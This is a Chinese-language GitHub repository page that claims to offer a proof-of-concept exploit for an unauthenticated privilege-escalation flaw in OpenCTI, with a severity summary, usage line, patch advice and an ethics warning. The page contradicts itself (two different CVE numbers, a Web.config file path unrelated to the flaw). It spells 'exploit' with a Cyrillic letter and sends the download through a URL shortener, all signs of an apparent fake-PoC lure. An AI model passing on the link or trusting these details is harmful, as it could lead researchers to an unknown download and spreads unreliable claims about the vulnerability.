ByteWraith1/CVE-2026-27906
GitHub: ByteWraith1/CVE-2026-27906
针对 OpenCTI 平台 CVE-2026-27960 权限提升漏洞的概念验证工具,可在无需认证的情况下通过 API 冒充任意用户访问系统。
Stars: 0 | Forks: 0
# CVE-2026-27960
### 概述
OpenCTI 平台存在一个权限提升漏洞,允许未经身份验证的攻击者利用 API 并以任何现有用户(包括默认管理员)的身份进行访问。
### 发布日期
2026 年 5 月 5 日
### 要点
- **严重程度**:严重
- **CVSS 评分**:9.8(高)
- **机密性**:高
- **完整性**:高
- **可用性**:高
- **攻击媒介**:网络
- **攻击复杂度**:低
- **所需权限**:无
### 要求
- Python 3.8+
- 库:requests, argparse(通过 `pip install -r requirements.txt` 安装)
### 用法
- 安装依赖项:`pip install -r requirements.txt`
- 运行 explоit:`python explоit.py --target --file "/path/to/Web.config"`
### 工作原理
此漏洞影响 6.6.0 至 6.9.12 版本。建议用户升级至包含必要修复的 6.9.13 版本。此外,建议使用 APP__ADMIN__EXTERNALLY_MANAGED 配置禁用默认管理员账户,作为增强安全性的临时解决方法。
### 道德使用警告
- 此脚本是 CVE-2026-27960 的概念验证,仅供教育和授权安全测试目的使用。
- **未经系统所有者明确许可,请勿在系统上使用此脚本。**
- 滥用可能违反法律,包括美国的《计算机欺诈和滥用法》(CFAA) 或其他地区的类似法律。
- 在测试任何系统之前,请务必获得书面同意。
### PoC explоit 下载请点击[此处](https://tinyurl.com/2s47k4a5)
标签:API安全, argparse, CISA项目, CVE-2026-27960, CVSS 9.8, JSON输出, masscan, OpenCTI, PoC, Python, requests, Web.config, Web报告查看器, 协议分析, 威胁情报平台, 威胁模拟, 安全漏洞, 无后门, 暴力破解, 未授权访问, 权限提升, 概念验证, 网络安全, 身份验证绕过, 逆向工具, 隐私保护, 高危漏洞, 默认管理员